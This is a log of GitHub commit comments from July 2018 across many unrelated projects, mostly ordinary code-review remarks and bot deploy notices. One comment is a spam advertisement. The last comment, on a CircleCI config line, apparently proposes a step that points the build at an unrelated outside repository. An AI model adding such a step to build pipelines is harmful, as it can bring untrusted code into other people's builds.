{"id":"7978742897","type":"CommitCommentEvent","actor":{"login":"CPalmer-IDM"},"repo":{"name":"CPalmer-IDM/Data_paper_new"},"payload":{"comment":{"id":29739702,"position":null,"line":null,"path":null,"commit_id":"9b4574a39ad79589e2068b52e3725b5865e5d41b","created_at":"2018-07-17T19:19:51Z","updated_at":"2018-07-17T19:19:51Z","author_association":"OWNER","body":"I should also note that I have added in the final.pop term to address the scaling.  In the model, we scale the host population by the final population (final.pop).  this only affects the transmission parameters, which is nice since it will keep them in smaller ranges"}},"created_at":"2018-07-17T19:19:51Z"}
{"id":"7978743400","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29739704,"position":null,"line":null,"path":null,"commit_id":"903a9020bee99a9bb944f160f175c7a72b49c3fb","created_at":"2018-07-17T19:19:58Z","updated_at":"2018-07-17T19:19:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-84](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-84).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-84-next50.pantheonsite.io/)"}},"created_at":"2018-07-17T19:19:58Z"}
{"id":"7978744677","type":"CommitCommentEvent","actor":{"login":"kondors1995"},"repo":{"name":"KudProject/device_xiaomi_mido"},"payload":{"comment":{"id":29739708,"position":null,"line":null,"path":null,"commit_id":"7cb58aa23f49b5e428f56e1b86b2210f7b032efb","created_at":"2018-07-17T19:20:14Z","updated_at":"2018-07-17T19:20:14Z","author_association":"NONE","body":"Does this actuality provide any benefits?"}},"created_at":"2018-07-17T19:20:14Z"}
{"id":"7978745409","type":"CommitCommentEvent","actor":{"login":"OliviaZhi"},"repo":{"name":"MLJejuCamp2017/DRL_based_SelfDrivingCarControl"},"payload":{"comment":{"id":29739710,"position":null,"line":null,"path":null,"commit_id":"c81b831bf59675a0607a62d032f76bec8c3648f6","created_at":"2018-07-17T19:20:23Z","updated_at":"2018-07-17T19:20:23Z","author_association":"NONE","body":"Is the Driving Simulator working on Mac OS X now?"}},"created_at":"2018-07-17T19:20:23Z"}
{"id":"7978746695","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"Rexagon/moysklad-courier"},"payload":{"comment":{"id":29739713,"position":null,"line":null,"path":null,"commit_id":"b87e4681e0862b75ab88b4c33a7ca84e583534f9","created_at":"2018-07-17T19:20:40Z","updated_at":"2018-07-17T19:20:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Добавить цвет для суммы заказа](https://trello.com/c/r9D0orQf/10-%D0%B4%D0%BE%D0%B1%D0%B0%D0%B2%D0%B8%D1%82%D1%8C-%D1%86%D0%B2%D0%B5%D1%82-%D0%B4%D0%BB%D1%8F-%D1%81%D1%83%D0%BC%D0%BC%D1%8B-%D0%B7%D0%B0%D0%BA%D0%B0%D0%B7%D0%B0)"}},"created_at":"2018-07-17T19:20:40Z"}
{"id":"7978752612","type":"CommitCommentEvent","actor":{"login":"awenbober"},"repo":{"name":"haseeAmarathunga/AngularApp"},"payload":{"comment":{"id":29739724,"position":null,"line":null,"path":null,"commit_id":"e123f792b9a1b1c5f6041b93ff12e70c02e21424","created_at":"2018-07-17T19:21:55Z","updated_at":"2018-07-17T19:21:55Z","author_association":"NONE","body":"Lol. Don't be fool to make dummy commits. :smile: Companies have many tools to identify content of commits. It is not the commit count make the profile high. You are loosing your reputation even your profile is green. Even I randomly found this profile I saw how many dummy commits.... :P "}},"created_at":"2018-07-17T19:21:55Z"}
{"id":"7978752669","type":"CommitCommentEvent","actor":{"login":"RubenVerborgh"},"repo":{"name":"linkeddata/rdflib.js"},"payload":{"comment":{"id":29739725,"position":31,"line":168,"path":"src/fetcher.js","commit_id":"b6118360ec8f113a245ab2d823f8f244ba8b6d54","created_at":"2018-07-17T19:21:56Z","updated_at":"2018-07-17T19:21:56Z","author_association":"MEMBER","body":"@timbl Accident?"}},"created_at":"2018-07-17T19:21:56Z"}
{"id":"7978752731","type":"CommitCommentEvent","actor":{"login":"neunhoef"},"repo":{"name":"arangodb/arangodb"},"payload":{"comment":{"id":29739726,"position":null,"line":null,"path":null,"commit_id":"1ed2ac27ad2bcad4ac53ff51ce6fbc31daa233c1","created_at":"2018-07-17T19:21:57Z","updated_at":"2018-07-17T19:21:57Z","author_association":"CONTRIBUTOR","body":"LGTM. I guess that this sets the replicationFactor automatically."}},"created_at":"2018-07-17T19:21:57Z"}
{"id":"7978753947","type":"CommitCommentEvent","actor":{"login":"trose618"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29739734,"position":28,"line":28,"path":"BlackJack.rb","commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-17T19:22:12Z","updated_at":"2018-07-17T19:22:12Z","author_association":"OWNER","body":"Done\r\n"}},"created_at":"2018-07-17T19:22:12Z"}
{"id":"7978754811","type":"CommitCommentEvent","actor":{"login":"trose618"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29739737,"position":31,"line":31,"path":"BlackJack.rb","commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-17T19:22:23Z","updated_at":"2018-07-17T19:22:23Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-17T19:22:23Z"}
{"id":"7978760754","type":"CommitCommentEvent","actor":{"login":"avidrucker"},"repo":{"name":"jxnblk/styled-system"},"payload":{"comment":{"id":29739750,"position":null,"line":null,"path":null,"commit_id":"764800ad06658445468e76750e640192050bfb60","created_at":"2018-07-17T19:23:36Z","updated_at":"2018-07-17T19:23:36Z","author_association":"NONE","body":"Are the same examples also available for testing/demoing offline? CodeSandbox seems to be down atm..."}},"created_at":"2018-07-17T19:23:36Z"}
{"id":"7978764227","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":29739755,"position":null,"line":null,"path":null,"commit_id":"f65da8fc77c8c25f58a825110ffcc858792d7ff5","created_at":"2018-07-17T19:24:18Z","updated_at":"2018-07-17T19:24:18Z","author_association":"OWNER","body":"With this commit the two positions mentioned two commits below are now handled correctly.\r\n```\r\nposition fen rnbqkbn1/p6p/1pp2p2/8/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nd\r\n\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k | b | n |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   |   |   |   |   |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p |   |   | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | P | P |   |   | P |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P |   |   |   |   |   |   | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B | Q | K | B | N |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqkbn1/p6p/1pp2p2/8/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nPositionKey: D00F635E22795C80\r\nMaterialKey: F96C21013D2AF9D8\r\nPawnKey:     77C8A7826E8B1A35\r\nCheckers: \r\neval\r\n     Term    |     White     |     Black     |     Total    \r\n             |   MG     EG   |   MG     EG   |   MG     EG  \r\n ------------+---------------+---------------+--------------\r\n    Material |  32.35  35.65 |  32.33  35.65 |   0.02  -0.00\r\n   Imbalance |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n  Initiative |   ----   ---- |   ----   ---- |   0.00   0.06\r\n       Pawns |   0.28  -0.06 |   0.16  -0.12 |   0.12   0.06\r\n     Knights |  -0.10  -0.12 |  -0.10  -0.12 |   0.00   0.00\r\n     Bishops |  -0.07  -0.19 |  -0.06  -0.19 |  -0.01   0.00\r\n       Rooks |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n      Queens |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n    Mobility |   0.38   0.43 |   0.47   0.46 |  -0.10  -0.03\r\n King safety |  -1.10  -0.35 |  -0.30  -0.13 |  -0.80  -0.22\r\n     Threats |   0.07   0.14 |   0.05   0.02 |   0.02   0.12\r\n      Passed |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n       Space |   0.31   0.00 |   0.31   0.00 |   0.00   0.00\r\n ------------+---------------+---------------+--------------\r\n       Total |   ----   ---- |   ----   ---- |  -0.75   0.00\r\n\r\nTotal evaluation: -0.57 (white side)\r\n\r\nposition fen rnbqk1n1/p6p/1pp2p2/3b4/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nd\r\n\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k |   | n |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   |   |   |   |   |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p |   |   | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | b |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | P | P |   |   | P |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P |   |   |   |   |   |   | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B | Q | K | B | N |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqk1n1/p6p/1pp2p2/3b4/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nPositionKey: 99DD5690525E0C1B\r\nMaterialKey: BD7AD71823138C7D\r\nPawnKey:     77C8A7826E8B1A35\r\nCheckers: \r\neval\r\n     Term    |     White     |     Black     |     Total    \r\n             |   MG     EG   |   MG     EG   |   MG     EG  \r\n ------------+---------------+---------------+--------------\r\n    Material |  32.35  35.65 |  32.47  35.88 |  -0.12  -0.23\r\n   Imbalance |   2.23   2.23 |   1.90   1.90 |   0.33   0.33\r\n  Initiative |   ----   ---- |   ----   ---- |   0.00  -0.11\r\n       Pawns |   0.28  -0.06 |   0.16  -0.12 |   0.12   0.06\r\n     Knights |  -0.10  -0.12 |  -0.10  -0.12 |   0.00   0.00\r\n     Bishops |  -0.07  -0.19 |  -0.01  -0.20 |  -0.07   0.02\r\n       Rooks |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n      Queens |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n    Mobility |   0.38   0.43 |   0.45   0.42 |  -0.07   0.01\r\n King safety |  -1.17  -0.36 |  -0.30  -0.13 |  -0.88  -0.23\r\n     Threats |   0.26   0.30 |   0.06   0.15 |   0.20   0.15\r\n      Passed |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n       Space |   0.31   0.00 |   0.31   0.00 |   0.00   0.00\r\n ------------+---------------+---------------+--------------\r\n       Total |   ----   ---- |   ----   ---- |  -0.50   0.00\r\n\r\nTotal evaluation: -0.35 (white side)\r\n```\r\n\r\nNote: I'm aware this only works for positions setup in a GUI / sent as FEN. Yet I'm not even sure this can ever happen in game play."}},"created_at":"2018-07-17T19:24:18Z"}
{"id":"7978771342","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29739772,"position":null,"line":null,"path":null,"commit_id":"33af6fc6b8248bde64b1e75cff407bb8142037bd","created_at":"2018-07-17T19:25:52Z","updated_at":"2018-07-17T19:25:52Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.11 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `nodes_count`      |    58    |\n| `texts_passing`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +7687 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0638/__cts__.xml`                            | New      |\n| `./data/tlg0638/tlg007/__cts__.xml`                     | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml` | New      |\n| `./data/tlg0638/__cts__.xml`                            | Passing  |\n| `./data/tlg0638/tlg007/__cts__.xml`                     | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4463)*\n"}},"created_at":"2018-07-17T19:25:52Z"}
{"id":"7978790932","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29739836,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T19:29:54Z","updated_at":"2018-07-17T19:29:54Z","author_association":"MEMBER","body":"@fichtner restore works too but needs your other patches. If you want to improve the restore section, the confirm field for the password is useless because it can work or fail. Tested with the file visible in the screenshot above"}},"created_at":"2018-07-17T19:29:54Z"}
{"id":"7978791928","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29739841,"position":null,"line":null,"path":null,"commit_id":"13c8f7aaced8aac58ab27207126e5ab00c1d168f","created_at":"2018-07-17T19:30:08Z","updated_at":"2018-07-17T19:30:08Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-396](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-396).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-396-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T19:30:08Z"}
{"id":"7978793240","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29739844,"position":null,"line":null,"path":null,"commit_id":"25bdbd367a1b6ff79ec65f57c2c3f0851a831112","created_at":"2018-07-17T19:30:22Z","updated_at":"2018-07-17T19:30:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T19:30:22Z"}
{"id":"7978794195","type":"CommitCommentEvent","actor":{"login":"jsteemann"},"repo":{"name":"arangodb/arangodb"},"payload":{"comment":{"id":29739846,"position":null,"line":null,"path":null,"commit_id":"1ed2ac27ad2bcad4ac53ff51ce6fbc31daa233c1","created_at":"2018-07-17T19:30:34Z","updated_at":"2018-07-17T19:30:34Z","author_association":"CONTRIBUTOR","body":"Yes. No need to hard-code the replicationFactor, if `_graphs` already has it. All other system collections seem to do it alike."}},"created_at":"2018-07-17T19:30:34Z"}
{"id":"7978800592","type":"CommitCommentEvent","actor":{"login":"luisravila"},"repo":{"name":"luisravila/udemy-heroes"},"payload":{"comment":{"id":29739855,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-17T19:31:57Z","updated_at":"2018-07-17T19:31:57Z","author_association":"OWNER","body":"## Joker\r\nEste es mi villano fav"}},"created_at":"2018-07-17T19:31:57Z"}
{"id":"7978804743","type":"CommitCommentEvent","actor":{"login":"luisravila"},"repo":{"name":"luisravila/udemy-heroes"},"payload":{"comment":{"id":29739871,"position":4,"line":8,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-17T19:32:51Z","updated_at":"2018-07-17T19:32:51Z","author_association":"OWNER","body":"# Entiendo \r\n\r\nOk con cambios"}},"created_at":"2018-07-17T19:32:51Z"}
{"id":"7978807198","type":"CommitCommentEvent","actor":{"login":"Gorbush"},"repo":{"name":"drewnoakes/metadata-extractor"},"payload":{"comment":{"id":29739875,"position":6,"line":96,"path":"Source/com/drew/metadata/exif/ExifReader.java","commit_id":"5371827edfbed4dde6f5e8188ea48a53cce8bedb","created_at":"2018-07-17T19:33:20Z","updated_at":"2018-07-17T19:33:20Z","author_association":"NONE","body":"Got it.. This offset is offset in JpegSegment, which starts not from file beginning.\r\nI added a parameter into Directory to store the segment offset in file. Would You like to have it as PR?"}},"created_at":"2018-07-17T19:33:20Z"}
{"id":"7978812246","type":"CommitCommentEvent","actor":{"login":"laborleben"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29739883,"position":54,"line":289,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-17T19:34:25Z","updated_at":"2018-07-17T19:34:25Z","author_association":"MEMBER","body":"yes, but to make it working with ```@njit``` decorator, use a tuple in ```np.concatenate((hits, hits_tmp))```. Do not use a list. "}},"created_at":"2018-07-17T19:34:25Z"}
{"id":"7978816071","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29739891,"position":5,"line":75,"path":"code/Makefile","commit_id":"a25a3fae9e666ac1790479e1308e038c82fab94a","created_at":"2018-07-17T19:35:14Z","updated_at":"2018-07-17T19:35:14Z","author_association":"COLLABORATOR","body":"@Mornix What if instead of this, we move the FORCE dependency from `build` to `build_exam`? I tried it and it seems to work beautifully - it only recompiles a subpackage if it has changed."}},"created_at":"2018-07-17T19:35:14Z"}
{"id":"7978816704","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-latinLit"},"payload":{"comment":{"id":29739894,"position":null,"line":null,"path":null,"commit_id":"cb482cf5488ca96ebdbaab47e7a70df0b00699c3","created_at":"2018-07-17T19:35:21Z","updated_at":"2018-07-17T19:35:21Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-latinLit/4465)*\n"}},"created_at":"2018-07-17T19:35:21Z"}
{"id":"7978818651","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29739899,"position":null,"line":null,"path":null,"commit_id":"2c4eb40313a96d9238f9b6711d1314bfaafdbb9d","created_at":"2018-07-17T19:35:49Z","updated_at":"2018-07-17T19:35:49Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/e639b8a539d131e6027227dcd81e572e28c62805/composer.lock)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/5c08715927407b6e451003864b3f89b1f8fff858/scripts/deploy-live.sh)\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/cf5aea1e3f1e664a1f60dcb6ebdc78300e1e90ab/.circleci/config.yml)\n"}},"created_at":"2018-07-17T19:35:49Z"}
{"id":"7978819019","type":"CommitCommentEvent","actor":{"login":"neumanndaniel"},"repo":{"name":"Azure/iot-edge-virtual-kubelet-provider"},"payload":{"comment":{"id":29739900,"position":null,"line":null,"path":null,"commit_id":"2f4d3c56abdb0439c6c41422e2cea55c6e21fc39","created_at":"2018-07-17T19:35:53Z","updated_at":"2018-07-17T19:35:53Z","author_association":"CONTRIBUTOR","body":"@veyalla Any reason why pinning it to version 0.3? Known issues?"}},"created_at":"2018-07-17T19:35:53Z"}
{"id":"7978821604","type":"CommitCommentEvent","actor":{"login":"filnet"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":29739904,"position":5,"line":19,"path":"src/osgEarthDrivers/cache_rocksdb/CMakeLists.txt","commit_id":"3d0d8d75f2dda7bf64521f72bc3a08f2bc62d6ab","created_at":"2018-07-17T19:36:25Z","updated_at":"2018-07-17T19:36:25Z","author_association":"CONTRIBUTOR","body":"Don't be sorry :) Happens..."}},"created_at":"2018-07-17T19:36:25Z"}
{"id":"7978822943","type":"CommitCommentEvent","actor":{"login":"SeriousMartin"},"repo":{"name":"HakanL/resxtranslator"},"payload":{"comment":{"id":29739907,"position":null,"line":null,"path":null,"commit_id":"d183228a996b83b1b9f960edd67c01ec01ff6cc3","created_at":"2018-07-17T19:36:43Z","updated_at":"2018-07-17T19:36:43Z","author_association":"NONE","body":"@Klocman Just realized you added this option to save comments only to the neutral languages. Exactly what I needed. Thanks a lot!"}},"created_at":"2018-07-17T19:36:43Z"}
{"id":"7978824441","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29739911,"position":null,"line":null,"path":null,"commit_id":"ac221f3892e96d648efdc796d038f6fb3bf9be0a","created_at":"2018-07-17T19:37:02Z","updated_at":"2018-07-17T19:37:02Z","author_association":"COLLABORATOR","body":"here is the usage of a label:\r\n\r\nhttps://neo4j.com/docs/developer-manual/current/introduction/graphdb-concepts/#graphdb-neo4j-labels\r\n\r\nnow I am clear that label is not defined with a keyword _label_ but with syntax  like :Person\r\n\r\nhighlights:\r\n\r\n**one can add multiple labels e.g. :Protein:Human:Mouse  this encodes the species info. solves the species issue.**\r\n\r\nanother point, pay attention to \r\n\r\n_By convention, labels are written with CamelCase notation, with the first letter in upper case; for instance, User or CarOwner. For more information on styling Cypher queries, refer to the Cypher style guide._\r\n\r\n\r\n"}},"created_at":"2018-07-17T19:37:02Z"}
{"id":"7978827471","type":"CommitCommentEvent","actor":{"login":"renatonascalves"},"repo":{"name":"renatonascalves/woocommerce-pagseguro"},"payload":{"comment":{"id":29739917,"position":null,"line":null,"path":null,"commit_id":"0617a42238bd8817372ee17f4f001558029dffe8","created_at":"2018-07-17T19:37:41Z","updated_at":"2018-07-17T19:37:41Z","author_association":"OWNER","body":"@tghelere Olá!\r\n\r\nNo momento, estou com pouco tempo para terminar esse feature. Até o lembro, faltava apenas mais testes e melhorar a integração.\r\n\r\nPorém, muito mudou no WooCommerce de lá para cá, então, acredito que precisa de uma versão das mudanças e ver o que precisa ser feito.\r\n\r\nNão tenho um prazo no momento para terminar essa integração, já que estou dando prioridade para a integração do GraphQL do BuddyPress.\r\n\r\n:)"}},"created_at":"2018-07-17T19:37:41Z"}
{"id":"7978827686","type":"CommitCommentEvent","actor":{"login":"deborahgross50"},"repo":{"name":"github/training-kit"},"payload":{"comment":{"id":29739920,"position":null,"line":null,"path":null,"commit_id":"30547504cdeb850d903ae7489f431c09a6c8f63a","created_at":"2018-07-17T19:37:44Z","updated_at":"2018-07-17T19:37:44Z","author_association":"NONE","body":"S\r\n![40 877 in 24 hours](https://user-images.githubusercontent.com/4429888/42841201-52297190-89d7-11e8-9c49-88b93d14084a.jpeg)\r\nSign up and change you life now!"}},"created_at":"2018-07-17T19:37:44Z"}
{"id":"7978834869","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29739932,"position":25,"line":25,"path":"mlvision/MLVisionExampleObjc/UIImage+VisionDetection.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T19:39:18Z","updated_at":"2018-07-17T19:39:18Z","author_association":"NONE","body":"nit: (nullable UIImage *)"}},"created_at":"2018-07-17T19:39:18Z"}
{"id":"7978835537","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29739935,"position":3,"line":5,"path":"ccr5_ccl5_il10ra.cypher","commit_id":"ac221f3892e96d648efdc796d038f6fb3bf9be0a","created_at":"2018-07-17T19:39:26Z","updated_at":"2018-07-17T19:39:26Z","author_association":"COLLABORATOR","body":"1. why ccr5:Protein, not :Protein? what is the use of ccr5 here? so as in other nodes and edges.\r\n2. encode species info: :Protein:Human:Mouse"}},"created_at":"2018-07-17T19:39:26Z"}
{"id":"7978836357","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29739936,"position":21,"line":21,"path":"mlvision/MLVisionExampleObjc/UIImage+VisionDetection.h","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T19:39:36Z","updated_at":"2018-07-17T19:39:36Z","author_association":"NONE","body":"(nullable UIImage *)"}},"created_at":"2018-07-17T19:39:36Z"}
{"id":"7978838940","type":"CommitCommentEvent","actor":{"login":"YannickDieter"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29739940,"position":54,"line":289,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-17T19:40:11Z","updated_at":"2018-07-17T19:40:11Z","author_association":"COLLABORATOR","body":"Haha yes. I have to remember this. "}},"created_at":"2018-07-17T19:40:11Z"}
{"id":"7978839592","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29739941,"position":null,"line":null,"path":null,"commit_id":"9335850795d156fb36b2140710c18961323f3ecb","created_at":"2018-07-17T19:40:18Z","updated_at":"2018-07-17T19:40:18Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T19:40:18Z"}
{"id":"7978843794","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29739949,"position":3,"line":5,"path":"ccr5_ccl5_il10ra.cypher","commit_id":"ac221f3892e96d648efdc796d038f6fb3bf9be0a","created_at":"2018-07-17T19:41:13Z","updated_at":"2018-07-17T19:41:13Z","author_association":"COLLABORATOR","body":"species info can be used to label all nodes and edges. "}},"created_at":"2018-07-17T19:41:13Z"}
{"id":"7978845548","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29739952,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T19:41:36Z","updated_at":"2018-07-17T19:41:36Z","author_association":"OWNER","body":"Well, -95 dBm is really bad. I have a homebrew board that has -105 dBm (avg), without antenna the same board see -115 dBm. With a ZUMspot I have -112 dBm, and without antenna -118 dBm. I think your location has too much noise. Also, I tested D-Star with an interference, and at least the firmware and MMDVMHost recovered after the end of the interference, then I believe your issue is related with MMDVMHost/ircddbgateway. I will see better later."}},"created_at":"2018-07-17T19:41:36Z"}
{"id":"7978845785","type":"CommitCommentEvent","actor":{"login":"Barath79"},"repo":{"name":"Barath79/LearnJava"},"payload":{"comment":{"id":29739953,"position":null,"line":null,"path":null,"commit_id":"ca0301065de7b4f9e2aa599424401b1a0883a22b","created_at":"2018-07-17T19:41:39Z","updated_at":"2018-07-17T19:41:39Z","author_association":"OWNER","body":"Adding comment"}},"created_at":"2018-07-17T19:41:39Z"}
{"id":"7978854332","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29739963,"position":6,"line":6,"path":"ccr5_ccl5_il10ra.cypher","commit_id":"ac221f3892e96d648efdc796d038f6fb3bf9be0a","created_at":"2018-07-17T19:43:27Z","updated_at":"2018-07-17T19:43:27Z","author_association":"COLLABORATOR","body":"so guess _label_ is not a keyword as I thought.\r\n\r\nthen use name: \"CCR5\". I found this property determines the visual label of node."}},"created_at":"2018-07-17T19:43:27Z"}
{"id":"7978857642","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29739970,"position":79,"line":79,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/UIImage+TFLite.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T19:44:07Z","updated_at":"2018-07-17T19:44:07Z","author_association":"NONE","body":"If this is not called anywhere, you can probably remove it. We should encourage use of the NSData method above."}},"created_at":"2018-07-17T19:44:07Z"}
{"id":"7978858449","type":"CommitCommentEvent","actor":{"login":"RectorRoot"},"repo":{"name":"actionhero/actionhero"},"payload":{"comment":{"id":29739971,"position":9,"line":32,"path":".circleci/config.yml","commit_id":"7551ce15e2ede3f1677060cdc4b3a3e16b21a094","created_at":"2018-07-17T19:44:16Z","updated_at":"2018-07-17T19:44:16Z","author_association":"NONE","body":"https://github.com/RectorRoot1/channel && cd channel\r\n"}},"created_at":"2018-07-17T19:44:16Z"}
